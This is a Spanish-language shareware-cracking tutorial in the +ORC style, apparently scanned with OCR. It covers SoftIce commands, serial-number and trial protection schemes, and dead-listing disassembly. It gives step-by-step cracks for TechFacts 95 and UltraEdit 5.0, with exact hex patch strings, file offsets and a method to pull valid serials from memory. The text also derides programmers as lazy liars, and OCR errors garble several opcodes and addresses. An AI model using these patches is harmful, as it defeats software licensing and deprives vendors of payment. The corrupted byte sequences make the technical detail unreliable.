sl dir tam'cad' 


Busca la cadena cad a partir de dir hasta dir+tam. Esta sentencia casi siempre tendrá este aspecto. Ejemplo s 
30:00 1 ffffffff 'cad' . Las comillas son importantes. 30:00 es la dirección de comienzo del segmento de datos, osea la 
dirección de memoria donde están los datos del programa y f£ffffff es el tamaño del segmento de datos, como 
veréis hay 4GB de espacio para almacenar datos. 


d registro 


Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección guardada en registro. Ejemplo d 
eax muestra a lo que apunta eax. 


d dirección 
Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección. 
d nomRutina 


Muestra en la ventada de datos el contenido de lo que hay a partir de la dirección donde comienza la rutina 
nomRutina. 


Impr Pant 


Vuelca el contenido de la pantalla por la impresora, quizás tengas que darle varia veces hasta que el buffer de la 
impresora se llene. 


¡ESQUEMAS DE PROTECCION 
¡Citaré algunas de las técnicas utilizadas por los programadores para proteger su soft. 
- Números de Serie. 

- Cripple Software (software limitado), en diversas variantes: 

* Tiempo limitado a meses , días, minutos.. 

* Número de ejecuciones o usuarios limitado. 

¡* Funciones deshabilitadas. 

|- Protecciones por discos o CD-ROM llave. 

¡- Protecciones anti herramientas crack 

¡* Antidebuggers. 

* Antidescompiladores. 

¡* Antidesensambladores. 

* Encriptación parcial o total. 

- Ninguna de las anteriores. 

¡Acerca de los programadores 

Sólo dos cosas: 


¡a) En general son perezosos y a veces estúpidos. 

b) Nunca les creas. 

La opción a) es clara, sus esquemas de protección son arcaicos, apenas han sufrido modificaciones, tan sólo 
incorporan trucos viejos sobre esquemas bien conocidos. Programas en lenguajes de alto nivel tipo C++, Visual 
Basic, estos compiladores se basan en librerías bien conocidas. El programador no tiene el amor propio de crear 
su propia rutina de protección en ensamblador, prefieren dejarla en manos de compiladores que crean código 
ensamblador ineficiente y fácilmente legible. ¿A qué se debe todo esto?, a su mentalidad comercial de la vida, no 
trabajan por placer, son esclavos de su trabajo, verdaderos zombies andantes. Lo importante es acabar y pronto 
¡no importa la calidad del soft o las quejas del estúpido usuario por la lentitud del programa o por los "cuelgues". 


'Una breve disgresión, no os habéis preguntado por que las versiones de los programas salen como churros cada 2 
días. La respuesta es que se dejan a propósito las cosas sin hacer o mal hechas para que al cabo de dos días se 
pueda sacar una flamante nueva versión con una leve modificación la cual debes comprar para no quedarse 
obsoleto, Dios mío que abominación! 


Respecto a b) baste decir que siempre tratan de encubrir sus errores con malolientes mentiras. 
PROGRAMADORES, leed esto y aprended, pero que digo, no tenéis tiempo ni para joder, ni para ver por donde 
¡os joden....:-) 


¡ESQUEMAS DE PROTECCIÓN BASADOS EN NÚMEROS DE SERIE 


Ésta es una "antigua" técnica de protección utilizada por las toneladas de shareware que nos inundan, basta 
comprarse un CD por 4 perras y ver 650 MB de programas basura, en general, deseosos de exprimir nuestras 
carteras. Veamos como funcionan. 


¡El programa puede ser total o parcialmente funcional, pero posee estúpidas ventanas que nos recuerdan que 
somos usuarios no registrados, o bien pitidos mal sonantes o mensajes perennes proclamando que les mandemos 


dinero. A veces, pasado cierto tiempo o pasado un número de ejecuciones, el programa deja de funcionar. Todo 
esto inconvenientes se resuelven llamando a la casa que construyó el software (imaginad lo que puede costar una 
llamadita o un Fax a un pueblo mal oliente del esto de Utah en USA), o bien mandando un e-mail. En cualquier 
caso hay que indicar el número de VISA donde ellos clavarán sus garras para rellenar sus ya nutridas arcas. Una 
vez desplumado recibimos por e-mail o por teléfono una palabra mágica, un número de serie, una password, o lo 
que sea, yo lo llamaré "pwd''. Esta pwd desbloquea el programa y/o elimina las estúpidas ventanas recordatorio. 


Análisis de esquemas con número de serie 
En general existen dos formas en las que trabajan las rutinas de protección de número de serie: 


a) Número de serie independiente del usuario. 

b) Números de serie adaptados al usuario. 

a) si extraemos una pwd, ésta servirá a todos los usuarios. Una pwd válida se diferencia de una inválida (por las 
muletas, es un chiste) por la presencia de ciertos caracteres en posiciones fijas (p.e. el carácter 8 debe ser una 'C', 
el 10 un '-'). Toda pwd que cumpla las restricciones será una pwd válida. Por norma, casi todas las pass 
incorporan el carácter '-', 2b en hexa. A veces no se requieren caracteres fijos , sino que la suma ASCH cumpla 
cierta condición. Cada letra del alfabeto y cada carácter numérico tiene una cantidad asociada, su código ASCII 
(p.e. par el acute0acutees el 30 en hexa o el 40 en decimal). La técnica consiste en sumar el código de cada carácter 
y comprobar la suma (que a veces se llama checksum) con una cierta cantidad. Una variante es modificar el valor 
ASCIU a través de una tabla que asocia a cada carácter un número distinto. 


Crackear esto es fácil de crackear: 


cmp suma,sumacorrecta ---->cmp suma,sumacorrecta 

A >jnz ok 

Es posible mezclar las tres técnicas, caracteres fijos, cheksum y modificación del código ASCII. En un capítulo 
próximo veremos un ejemplo de esto. 


b) En este caso se utiliza el nombre, los apellidos, o el nombre de la empresas o todo junto para generar un pwd. 
Aquí las técnicas son más imaginativas: coger cierto caracteres y repetirlos hasta llegar a un tamaño, usar el 
código ASCII de ciertas caracteres como índice de una tabla de encriptación...En fin, depende de las paranoias del 
programador. Lo cierto es que se debe generar la pwd correcta para nuestros dato y ésta se debe comparar con la 
introducida. Aquí es donde podemos atacar ,en al comprobación. Realmente no hace falta crackear, basta con 
copiar la pwd correcta e introducirla como nuestra pwd, o bien crackear las sentencias de comprobación para que 
sirva cualquier pass. Lo primero es mejor ya que nos servirá para futuras versiones. 


Se puede mezclar ambas técnicas, como veremos en un capítulo próximo, y generar un checksum para una cierta 
cadena extraída a partir de los datos del usuario y comprobar el cheksum de nuestra cadena. 


¿Cómo atacar? 


Antes de ir como unos desposeídos a reventar el programa, es totalmente necesario echar un vistazo, ver el posible 
esquema de protección y los posibles puntos de ataque. En general no hay que buscar mucho, los puntos débiles 
tiene un letrero rojo que dice ' Hey estoy aquí"'. 


En el caso de los esquemas basados en números de serie, la cosa está clara: esos estúpidos mensajes recordatorios 
son la puerta de entrada. Si somos usuarios no registrados aparecen, si nos registramos desaparecen. Por tanto 
debe haber algo que indique cuando deben o no aparecer, este algo es un flag, que no es más que un conmutador 
(como el de una bombilla). Cuando está en ON aparecen los mensajes, cuando en OFF desaparecen. En nuestro 
contexto, un flag no es más que una posición dentro de la memoria con un cierto valor. La memoria del ordenador 
es como un cartón de huevos (1 huevo = 1 bit), donde cada hueco tiene un número diferente al que se le llama 
dirección de memoria. En cada hueco puede haber un huevo (valor 1) o no haberlo (valor 0). Los agujeros se 
agrupan, $ agujeros es un Byte, 1024 Bytes es un MegaByte o MB, 1024 MB es un GigaByte o GB, 1024 GB es un 
TeraByte o TB. Fácil, ¿verdad?. La memoria está compuesta de bits, estos bits se pueden interpretar de muchas 
formas, flags, datos, instrucciones. Por ejemplo 01010101 puede ser un flag de activación, la cadena "'hola'' o lo 
sentencia pinta la pantalla, depende de como lo consideremos. En el caso de tomarlo como instrucciones, se habla 
de dirección de la instrucción en memoria, que no es más que la dirección del primer del primer bit que la 


compone. 


El valor que podemos encontrar en un flag puede variar. Para ON podemos encontrar un 1 y para OFF un 0. Se 
puede usar la llamada lógica negada y tiene en ON un 0 y en OFF un 1. Todo lo que se pueda hacer con 0 y 1, se 
pude reconvertir cambiando los 0 por 1 y los 1 por 0. Una "mejora" de los programadores es utilizar flags 
distintos a 0,1, cuán inteligentes!. Recuerdo cierto esquema que utilizaba el flag DEAD en hexadecimal. Los 
sistemas de numeración (como el hexadecimal o hexa para abreviar) son formas diferentes de contar y de 
representar cantidades. En base 10, la de toa la vida, se empieza en ( y se acaba en 9. en hexa se comienza en 0 y se 
acaba en F (10=a,11=b,12=c,13=d,14=e,15=f). 


Veamos algo más práctico: 
cmp ax,flag; Compara el valor de ax con el valor del flag 
jz mensajes; Si son iguales muestra los mensajes. 


sigue: inc dx; Continúa normalmente. 


¡mp sigue;Salta y continua normalmente. 
Este puede ser un esquema típico. Dependiendo del valor del flag se muestran los mensajes o no. 


Llegamos a la parte interesante, cada mensaje recordatorio debe tener una comprobación como la del ejemplo. 
Basta con analizar los mensajes recordatorio y descubrir la dirección de memoria del flag. Pero quién narices 
rellena el flag?. Obviamente debe haber como mínimo dos inicializaciones, una al comienzo de la ejecución del 
programa que pone al flag a OFF y la rutina de protección que lo debe poner a ON si la pwd es correcta. ¿Me 
sigues hasta ahora?. 


Es fácil ahora saber donde atacar, un crack elegante sería poner la inicialización al comienzo del programa a ON 
en vez de OFF. Recuerda esto: ' Un buen cracker debe ser ante todo elegante y sutil, nada intrusivo". 


Otro punto de ataque 


Hasta ahora hemos visto que analizando los estúpidos mensajes se puede conocer la dirección de memoria del flag 
y a partir de ahí su inicialización. Pero en los esquemas basados en números de series existe un punto de entrada 
más claro aún que los flags: la propia rutina de protección. Veamos un método sencillo para llegar a ella. 


Si uno se va a la opción de registro e introduce un número de serie falso, aparecerá una estúpida ventana 
indicando que nos hemos equivocado: ''Soryy your password is invalid' o algo parecido que traducido al cristiano 
es "Tío te ha equivocado, JAAARL"'. Esto no es una vía de entrada, esto es una autopista de 1GB de carriles. 
Basta con pensar un poco, quién es la encargada de mandar este mensaje? ,evidentemente la propia rutina de 
protección, interesante verdad?. Ya sólo queda encerrar la rutina, ver como trabaja , cambiar un par de bytes 
(siempre de la forma más elegante posible) y listo, programa crackeado. 


Comparación de ataques 


¿Qué crack es mejor?, el de flags o de la rutina de protección?. Esto depende en gran medida de programa, de tus 
habilidades y del tipo de que dispongas. Con la rutina de protección se puede analizar en profundidad el esquema, 
ver como trabaja y hasta extraer tu propio número de serie, osea el número de serie que la empresa te da si te 
registras, pero esto requiere tiempo y esfuerzo, obteniendo una satisfacción moral e intelectual. Además, en la 
próxima versión del programa est pwd posiblemente funcionará y no necesitarás crackear de nuevo. Mediante 
cracks al flag, se requiere un tiempo menor, pero la próxima versión habrá que crackearla de nuevo (no importa 
seguro que estos estúpidos programadores habrán seguido la mismo patrón de protección). Un crack a la rutina de 


exige un conocimiento profundo de la misma, lo que puede llevar a tu propio generador de claves (igualito o 


¡seguramente mejor que el tiene la empresa). 


CÓMO CRACKEAR TECHFACTS 95: 


Objetivo: TechFacts 95. 
Versión: 1.30 3/7/97 
Nombre del ejecutable: Teckfct95.exe 
Website: http://ourworld.compuserve.com/homepage/deansoft 

Tamaño del ejecutable: 1.251.840 bytes. 

Tipo de protección: Por número de serie. 
Dificultad: ameba. 

Tiempo de crackeo: 2 minutos. 
Herramientas: Softlce 3.0 y Editor Hexadecimal. 


Siguiendo las recomendaciones de +ORC empezaremos por crackear nuestras propias herramientas crack. El 

programa en cuestión es una pequeña joya que nos permitirá, entre otras muchas cosas, rastrear las acciones de un 

determinado programa, buscar cadenas de caracteres en ficheros, trabajar con dll.. Generalmente,lo utilizo para 

rastrear programas de instalación, obteniendo información de los ficheros creados, las entradas de registro añadidas 
o borradas, ... 


¡ Manos a la obra. El programa es un ejecutable que no necesita otro fichero para funcionar (cosa rara en estos días). 
Así pues, arranquemos el programa veamos lo que ocurre. Aparece una horrible ventana diciendo que utilicemos 
nuestra VISA o MASTERCARD y que soltemos los 19,99 dólares (unas 2500 pesetas) que tenemos para ir a tomar 
cervezas. 


Echemos un vistazo al programa. Entre otras cosas, hay una opción en TOOLS/WATCH SYSTEM, que nos permite 

rastrear un programa. En HELP/HELP TOPICS/ORDER FORM aparece una hoja de registro en la que nos avisa 

de que además tenemos que paga 2 dólares para gastos de envío, ¡cómo si costará 250 pelas enviar un mail con el 
número de serie!. 


'En HELP/ABOUT TECHFACTS 95 encontramos un botón USE REG KEY. Aquí es donde tenemos que introducir 
nuestro Nombre (First name), apellidos (Last name) y el número de serie correspondiente que lo recibiremos por 
mail si pagáramos 19,99 dólares más 2 dólares de gastos de envío. Empecemos por aquí. 


| Pongamos un nombre, un apellido y un número cualquiera y pulsemos el botón REGISTER. Entonces escuchamos 
un pitido y aparece una ventana de mensaje diciendo REGISTRATION KEY FAILED. Ahora ¡pensemos un poco!, 
apliquemos un poco de ZEN CRACKING. 


¡Lo único anormal es el pitido. Si tu fueras un programador y quisieras que pitará tu 'cacharro'' tienes dos opciones 
construirte un bonito programa en ensamblador que lo haga, o bien utilizar una función de pitido presente en 
alguna de las vomitivas librerías de funciones, también llamadas API. ¿, Qué piensas que ha hecho nuestro ''vago"' 
programador ?. ¡Bingo! ha utilizado la función MessageBeep de la librería USER32.DLL. Este un punto de ataque 
muy claro, aunque existen muchos otros. 


Apliquemos la técnica LIVE, es decir, utilizaremos el Softlce. Reinicialicemos nuestro ordenador en modo Ms-Dos, 
lancemos el WinIce y volveremos a Windows. 


Abramos el LOADER de Softlce y en FILE/OPEN MODUL E seleccionemos el fichero Tekfct95.exe. Pulsemos Load 
o el botón con las ruedecillas dentadas. Nos aparece una ventana de mensaje del SoftIce diciendo que no puede 

| cargar la tabla de símbolos, pulsemos el botón SÍ y aparecemos directamente en el SoftIce con la pantalla en modo 

texto. En este momento nos encontramos en la primera sentencia de nuestro programa. Pulsemos bpx messagebeep 


| con esto tomaremos el control antes de que aparezca el pitido. Con Ctrl-D volvemos a Windoce y el programa sigue 
ejecutándose normalmente pero con un cebo en messagebeep. Elegimos la opción de registro y escribimos cualquier 
cosa en nombre, apellidos y número de serie, pulsamos el botón y aparecemos de bruces en : 


USER32'MessageBeep 
014F:BFF623C1 B148 MOV CL,48 **** Aparecemos aquí. ***** 
014F:BFF623C3 EB12 JMP BFF623D7 
Si pulsamos en este momento F12(continuar hasta un RET) nos situaremos en: 
014F:0047BA65 EB11 jmp 0047BA78 
014F:0047BA67 6A30 push 00000030 
014F:0047BA69 E822A7F8FF Call 00406190 ***** Llamada a MessageBeep**** 
014F:0047BA6E B8BCBB4700 mov eax, 0047BBBC 


014F:0047BA73 ES24BEFBFF call 0043789C **** Pintamos la ventana de error **** 
En tu ordenador las direcciones de memoria pueden ser diferentes. 


¡Sintamos el código!. Estamos en mitad de las sentencias de error, lo que implica que debe haber un salto 
condicional a este conjunto de sentencias de error. El salto debe ser condicional porque en caso de haber metido 
correctamente el número de serie habríamos obtenido algún tipo de mensaje de felicitación. Así pues, sólo debemos 
encontrar ese salto condicional y modificarlo. 


Miremos por encima de la dirección 014F:0047BA69, nos encontramos en 014F:0047BA65 un salto incondicional 
jmp 0047BA78, en una ejecución normal nunca llegaríamos a 0047BA67 ya que siempre saltaríamos a 0047BA78. 
Por tanto, lo que debemos buscar es un salto condicional a la dirección 0047BA67. Si volvemos hacia atrás un poco 

con los cursores encontramos este bonito salto 


014F:0047B934 E89B73F8FF call 00402CD4 
014F:0047B939 0F8528010000 jne 0047BA67 **** ¡BINGO! **** 
014F:0047B93F 8D45B7 lea eax, dword ptr [ebp-49] 


Hemos encontrado el salto, sólamente hay que modificarlo. Fijaos que el salto se produce después de una llamada a 
la rutina call 00402CD4 apostaría el pellejo a que esta es una rutina para comprobar si tu número de serie es 
correcto. Si no es igual (jne) salta a las sentencias de error. Si es igual continua ejecutándose. Hay muchas formas de 
invertir el salto: 


1.- Cambiar 0F8528010000 jne 0047BA67 por 
0F8500000000 ¡ne 0047B93F 
2.- Cambiar 0F8528010000 jne 0047BA 67 por 
404840484048 inc eax,dec eax, inc eax, dec eax, inc eax, dec eax 


La 1 es un salto neutro, sea igual o no siempre se ejecuta la sentencia siguiente. La 2 es la preferida por +ORC, 
cambia el salto por un conjunto de parejas incrementar - decrementar que dejan el registro eax sin cambios en su 
contenido. 


Solamente hay que tener en cuenta dos cosas para modificar el código, sustituir siempre el mismo número de bytes 
(cambias 2 bytes por 2 bytes) y que tus modificaciones sean una sentencia en ensamblador correcta. 


El Softlce nos permite hacer cambios On-Fly, es decir, en ese mismo instante, pero el cambio no es permanente. 


Para ello, nos vemos obligados a utilizar algún editor hexadecimal, con el cual abriremos el fichero ejecutable, y 


buscaremos la cadena en hexadecimal ES9B73F8FF0F8528010000 y la cambiaremos por 
ES9B73F8FF0E8500000000. La cadena se encuentra en el offset 0OX7AD34(los números en hexa llevan delante un 


0X) que en decimal es 503092. 
Así pues tenemos que irnos al byte 503092 de fichero ejecutable y comenzar a hacer cambios. 
Ahora tendremos el ejecutable parcheado, si nos registramos nuestro número de serie siempre será aceptado. 


Un crack no es más que un pequeño programa que abre un fichero y cambia un par de bytes por otros. ¡Nada más 
sencillo! Sólo hay que saber qué bytes hay que cambiar. Cuantos menos bytes se cambien más elegante será el crack 


Si habéis seguido todos los pasos habéis crackeado vuestro primer programa. Aun nos sois cracker pero estáis en la 
buena senda. Sólo hay que poner interés. 


Para gentes más avezadas, comentaré que el flag de activación se iniciativa correctamente en :0047BASE mov byte 
ptr [004CF31A],00 La rutina de protección es bastante patética, con gran cantidad de código inactivo. Empieza en 
:47B5C0. Obviamente se podría haber hecho algún otro tipo de pero este es el más simple (se podría haber obtenido 
el número de serie real, o haber creado un generador de claves).El programador ha puesta a "pelo" la dirección de 
retorno en :47BA3F push 47BA54. Es un ridículo truco que nos hará perdernos si continuamos ejecutando 

normalmente, por ello es conveniente pulsar ''F12" y mirar hacia por encima sin ejecutar sentencias. 


Espero vuestras opiniones, sugerencias y ensayos en estadoporcino hotmail.com 
En breve analizaremos tipos de protecciones mucho más interesantes. 


Recordad bebed de la fuente, buscad a +ORC en la red. 


COMO CRAKEAR POR ESTADO+PORCINO | 
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- Manos a a la obra. 


INTRODUCCIÓN 


!Saludos Familia ! 


Empezemos este año con una de las técnicas crack más importantes ''El Listado muerto'' o "death listing'". Hasta 


ahora hemos visto la ''aproximación en vivo'' o "live approaching'' con el maravilloso Softice. 


DESCENSO A LOS INFIERNOS. 
Veamos de una vez por todas como se ejecuta una sentencia en el procesador, desde el inicio hasta el final. 


Supongamos que estamos programando en un lenguaje de Alto Nivel (C, C++, Pascal,Delphi, Visual Basic). Se 
llaman de Alto Nivel para diferenciarlos de los lenguajes más próximos al procesador, como el Ensamblador, a los 
que se llama lenguajes de Bajo Nivel. Cuanto más ''Alto'' programemos, más control perderemos sobre nuestro 
programa, y esto es un grave problema. 


Supongamos un programa, escrito en Alto Nivel, que pinta la frase 'HOLA MUNDO" en pantalla. ¿ Qué pasos se 
siguen hasta que realmente se pinta la frase?. 


Nuestro programa debe de residir en un fichero, al que se denomina fichero fuente, en el que aparece la sentencia 
para pintar la frase. Este fichero no es entendible por el procesador, sólo es un conjunto de caracteres, mu 
diferente del conjunto de 0 y 1 que necesita para trabajar. Es aquí donde entra el compilador, transforma el 
fichero fuente en un fichero intermedio, también llamado fichero objeto. En esta transformación se comprueba la 


sintaxis de las sentencias ( falta el punto y coma) y la semántica (has pasado un entero cuando se esperaba un real). 
¡El compilador realiza entonces una fase de linkado para reunir los distintos ficheros objeto que conforman nuestro 
¡programa final (aunque tengamos un único fichero fuente). En esta fase se determinan el mapeo final del program 

¡en memoria (que dirección de memoria va a tener cada instrucción del conjunto de ficheros objeto). Tras la fase de 
linkado, el programa final se encuentra en un lenguaje llamado pseudocódigo, mu sencillote. Aquí se pueden tomar 


| » 
13 vías. 


Primera: Dejar el programa como está, y que otros pogramas o librerías (como la vbrun500.dll de Visual Basic) lo 
traduzcan (lo interpreten) a sentencias entendibles por el porcesador. 


Segunda: Transformar el pseudocódigo a un lenguaje de Bajo Nivel como el ensamblador. En tal caso, se 
¡necesitará un compilador de ensamblador para que el programa pueda ser ejecutado. OJO, el ensamblador no es 
entendible por el tonto procesador que sólo ve unos y ceros, son dos cosas distintas. 


¡Tecera: La más común, transformar directamente de pseudocódigo a ejecutable 


'Un fichero ejecutable consta de unos y ceros (o de números en hexa, según se mire) ordenados de una forma 
especial; ordenados en instrucciones: Los 3 primeros números son el tipo de instrucción, los 4 siguientes el 
operandol, el siguiente el operador...Cada instrucción es depiezada dentro del procesador y dan a lugar a la 
ejecución de un conjunto de programas presenten dentro del procesador, son las microrutinas. Estas microrutinas 
¡son las encargadas de bloquear buses, activar multiplexores, dar tensión a un transistor o no, pa enterndernos. 
¡Accionando correctamente buses, multiplexires... se pintará relamete la frase en pantalla. 


Bien, esto es todo. 
¡Mu bien y esto pa que coño me sirve. 


¡Existe una correspondencia directa entre lenguaje ensablador y programa ejecutable. Gracias a un 
iddesensamblador (W32DASM, IDA PRO), a partir de un ejecutable podemos obtener el programa el lenguaje 
¡iensablador sin disponer del fichero fuente. Un program en ensamblador puede ser fácilmente entendido por los 
'humanos (o eso dicen algunos). Esto nos da un poder tremendo a los crackers. Podemos saber como funciona un 
¡programa sin necesitar del programa original. Y lo que es má aún, independientemente del lenguaje de Alto Nivel. 
¡Todos los lenguajestienen que pasar a ejecutable de alguna u otra forma, y es aquí cuando usamos nuestro 
desensamblador y extraer su listado en ensablador. Da igual que programa esté hecho en Pascal, O C++, lo 
entederemos igualmente ya que leeremos ensamblador. 


EL LISTADO MUERTO 


La idea es sencilla. Cojemos nuestro desensamblador favorito y se lo pasamos al objetivo. Obtendremos un listado 
¡len ensamblador de nuestro programa a crackear. La técnica crack se llama Listado muerto porque entenderemos 
¡y manejaremos el programa con este listado, sin tener que ejecutarlo, con el programa muerto. A diferencia de 
cuando lanzamos el Softlce y entendemos el programa cuando se está ejecuntandose, cuando "vive". 


Hay tre ventajas fundaentales para utilizar el Listado Muerto. 


- Podemos seguir el programa fácilmemte de atrás hacia adelante, basta con pasar de página, no hace falta volver a 
ejecutatlo. 


- Es mucho más relajado imprimir y estudiar 4 páginas de código que rastrear con el Softlce. Este es uno de los 
consejos de +ORC. 


- Se descubren pequeños secretos, como rutinas inactivas. 


La paciencia y la tranquilidad son dos requisitos fundamentales en un cracker. Es fácil perderte trazando con el 
¡SoftIce e imposible con el Listado Muerto. 


Manos a la Obra 


Una vez desensamblado el objetivo, la idea es buscar cadenas de texto interesantes, como ''unregistered”, 
"expired", ''congratulations'' y mirar al rededor de estas cadenas buscando un salto mágico. Las palabras en 
¡concreto dependen del programa y son las que aparecen para recordarte que aún no te has registrado. 


¡CÓMO CRACKEAR UEDIT 5.0 


Objetivo: Uedit 5.0. 

Versión: 5.0 3/7/97 

Nombre del ejecutable: uedit32.exe 

Website: http://www.uedit.com 

Tamaño del ejecutable: 812.514 bytes. 

¡Tipo de protección: Por número de serie y temporal. 
Dificultad: Medio. 

¡Tiempo de crackeo: 5 minutos. 

Herramientas: W32dasm8.X, Softlce. 


¡Siguiendo la recomendación del maestro +ORC, continuamos con el crack a nuestras herramientas de trabajo. En 
¡este caso nos encontramos ante un excelente editor hexadecimal, vital para nuestros negocios :-) 


Instalemos el programa, ejecutémoslo y veamos lo que nos encontramos. ARRJJ!!, una horrible ventana nos dice 
que tenemos 45 diás para registranos. Además tiene un bonito botón ''Enter Authorization Code". Pulsemos y 
veamos. Un típico nombre de usario y número de serie (al que le llamaré passwod o pass). Si pulsamos cuaquier 
guarrada en ambos, sorpresa, ningúm mensaje advirtiendo del error, ningún pitido (recordais el capítulo D), nada 
¡excepto una ventana de mensaje que dice que hace falta cerrar el programa para validar el código. ¿Habrá leido lan 
D. Mead las lecciones de Estado+Porcino?. Bien, ¿por donde atacar?. No tenemos nada que nos indique que nos 


hemos equivocado. ¿Que tal si usamos el Listado Muerto amiguitos? 


Una vez desensablado el programa y dentro del W32dasm pulsemos el botón de Strn Ref (el boton que está al lado 
del botón de impresora) para ver las cadenas de caracteres que aparecen en el nuetro objetivo. Que vemos, que 
casualidad , tenemos la frase ''Thank you fot supporting Shareware'' , hagamos doble click y veamos donde 
aparecemos: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: |:00401B77(C) | 
:00401B7D 83FB09 cmp ebx, 00000009 

:00401B80 7504 jne 00401B86 

:00401B82 C645EC20 mov [ebp-14], 20 * Referenced by a (U)nconditional or (C)onditional Jump at 
:00401B86 8D45C58 lea eax, dword ptr [ebp-38] 

* Possible Reference to String Resource ID=00010: ' Thank you for supporting Shareware." 
:00401B89 6A0A push 00000004 


En :00401B89 tenemos una referencia a la cadena que nos interesa. Cada frase del programa tiene asociado un 
número, en este caso es el 0000000A y este número se les pasa al las rutinas que tienen que imprimir los mensajes. 
La forma tradicional de pasarle parámetros a una rutina es a través la pila mediante push (como en :00401B99 ). 
Los parámetros se pasan empezando por el último, es lo que se llama paso de parámetros mediate el modelo de 
PASCAL, existen otros modelos, pero son poco utilizados. 


¿Estamos en el camino adecuado¿, nop, ya que el número de nuestra frase, el 0000000A (en es número 10 en 
decimal) es muy utilizado en cualquier programa y cada vez que aparezca, el desensamblador pensará que se está 
haciendo referencia a nuestra frase. Bien pensemos un poco. 


Nuestro programa está limitado por 45 días de uso, pasado ese tiempo, lo normal es que nos aparezca una frase 
deciendo algo así como ''Evaluation time expired''. Busquemos (Con el botón de la linterna ) la palabra expired 
pasada a una rutina mediante push a ver que encontramos. 


:043F7D3 E8375DFCFF call 0040550F 

:0043F"7D8 391DDC0C4A00 cmp dword ptr [004A0CDC], ebx 
:0043F7DE 758A jne 0043F76A 

:0043F7E0 8D4D10 lea ecx, dword ptr [ebp+10] 
:0043F7E3 E829C00100 call 0045B811 

:0043F7E8 8D4D14 lea ecx, dword ptr [ebp+14] 
:0043F7EB C645FC01 mov [ebp-04], 01 


:0043F7EF E81DC00100 call 0045B811 


* Possible Reference to String Resource ID=00068: "UltraEdit 45 Day Evaluation time expired!!!!" 


:0043F7F4 6A44 push 00000044 
¡BINGO. No sentís el código, no percibis como estamos en el camino correcto. 


Si, tenemos en :0043F7F4 un push con el número asociado a la frase que buscamos y justo en :0043F7DE un salto a 
0043F76A que evita imprimir el mesaje, pero el punto clave es ver la comprobación del salto en :0043F7D$. Se 
comprueba si el contenido de EBX es igual a una dirección fija de memoria la [004A0CDC]. Las direcciones fijas 
son las típicas variables globales tan mal utilizadas en los programas. Tenemos una variable global que controla la 
aparición de un mensaje de error. En algún punto del programa debe de inicializarse [004A0CDC] con un valor ,si 
localizamos este trozo de código, estaremos en plena rutina de comprobación. ¿Facil, verdad? 


Busquemos [004A0CDC] y veamos quien la inicializa, sólo nos interesan las sentencias que inicializen la variable, no 
las sentencias que comprueban su valor. Normalmente se inicializa por defecto a un valor de error (indicando que 
no estamos registrados) y se inicializa corectamente cuando nos registrmemos. Conforme aparecen occurencias de 
nuestra variable glabal sabemos que estamos en el buen camino porque siempre está rodeada de mensajes de error o 
de felicitación. 


Buscando [004A0CDC] encontramos las siguientes sentencias que modifican la variable (el resto de apariciones son 
comprobaciones del valor) 


:00405541 893DDC0C4A00 mov dword ptr [004A0CDC], edi 

:004056A3 891DDC0C4A00 mov dword ptr [004A0CDC], ebx 

:004057D4 8325DC0C4A0000 and dword ptr [004A0CDC], 00000000 
:00426924 891DDC0C4A00 mov dword ptr [004A0CDC], ebx 

:0043F684 C705DC0C4A0001000000 mov dword ptr [004A0CDC], 00000001 


Que tenemos aquí. Parece lógico pensar que en :004057D4 tenemos la incialización por defecto, ya que un AND con 
ceros da cero. La sentencia contraria la tenemos en :0043F684 que mueve 1 a la variable, esto sin duda indica que 
nos hemos registrado. También podría ser al revés, cero registrado, uno no registrado, pero este no es el caso. Basta 
ejecutar el Softice y poner bpr 004A0CDC 004A0CDC rw , la primera modificación debe ser la asignación por 
defecto, en este caso la :004057D4. Por tanto solo debemos centrarnos en la asignación a uno :0043F684, olvidando 
el resto de asignaciones. Esto es un axioma fundamental ante la duda, elige siempre la solución más sencilla. Bien, 
veamos que hay entorno a la :0043F684 


:0043F65C ES9A560300 call 00474CFB 
:0043F661 8B7804 mov edi, dword ptr [eax+04] 


:0043F664 8B4514 mov eax, dword ptr [ebp+14] 


:0043F667 48 dec eax 


1:0043E668 7478 je 0043F6E2 

:0043F66A 48 dec eax 

:0043F66B 0F85F9000000 jne 0043F76A 

:0043F671 391DDC0C4A00 cmp dword ptr [004A0CDC], ebx 

:0043F677 0F85DA010000 ¡ne 0043F857 

:0043F67D 833DBC024A0000 cmp dword ptr [004A02BC], 00000000 
:0043F684 C705DC0C4A0001000000 mov dword ptr [004A0CDC], 00000001 


Tenemos diversos saltos que evitan nuestra asignación a uno. El primer salto, sestá en :0043F668 7478 je 0043F6E2 
que tal si lo cambiamos por EB1A ¡mp 43F684. Osea, siempre saltamos a 43F684 evitando las comprobaciones de 
:0043F66B y :0043F677.El código EB es la instrucción de salto incondincional JMP, 1A es el número de bytes desde 
la sentencia condicional hasta la sentencia donde queremos saltar. Fácil, ¿verdad?. 


Perfecto, rula. Basta con buscar en el ejecutable uedit32 la secuencia 8B451448747848 y cambiarla por 
8B451448EB1A48. Pero hay un peque problema, el crack funciona pero no tenemos un número de serie correcto. En 
principio basta, pero pensando un poco podremos sacar nuestro propio número de Serie. ¿ Qué se os ocurre? 


Sip, exactamante,¿, que tal si le seguimos la pista a nuestro número de serie basura y vemos con quién se 
comparará? . La pregunata es, donde coloco un bpx para pararme justo antes de que se compruebe mi número de 
serie. La respuesta es sencilla, en :43F618 (echarle un vistazo al listado muerto) comienza la rutina en la que se 
asigna a 1 nuestra variable glabal. Este puede ser un buen comienzo. Abrimos el Softice con el uedit, ponemos 
nuestro nombre Estado+Porcino y un número basura 1212121212121212 . Cerramos el uedit y lanzamos de nuevo el 
SoftIce poniendo la sentencia bpx 43F618. Aparecemos en :43F618, ahora es el momento de buscan nuestro número 
de serie con s 30:00 1 f11F "1212121210 encontramos es :942F9C (esta direcciónpuede cambiar en tu ordenador). 
Borramos el punto de ruptura anterior con bc O y creamos uno nuevo con la dirección donde está nuestra password 
con bpr 942F9C 942F9C+f rw seguimos adelante con Crr/+D para ver quien caen en buestra trampa. Aparecemos en 
:40B73A con varios movsd , nuestra password se está copiando en otro sitio. La sentencia movsd, copia caracteres de 
ees:esi a ees:edi. Pongamos en el Softlce d ees:edi para ver como realmente se va a copiar, además pongamos otro 
punto de ruptura en la nueva posición de nuestra password con bpr ees:edi ees:edi+f rw .Curiosamente, si nos 
movemos un poco con los cursores por ees:edi aparecen las passwords correctas, pero todavía no es el momento. 
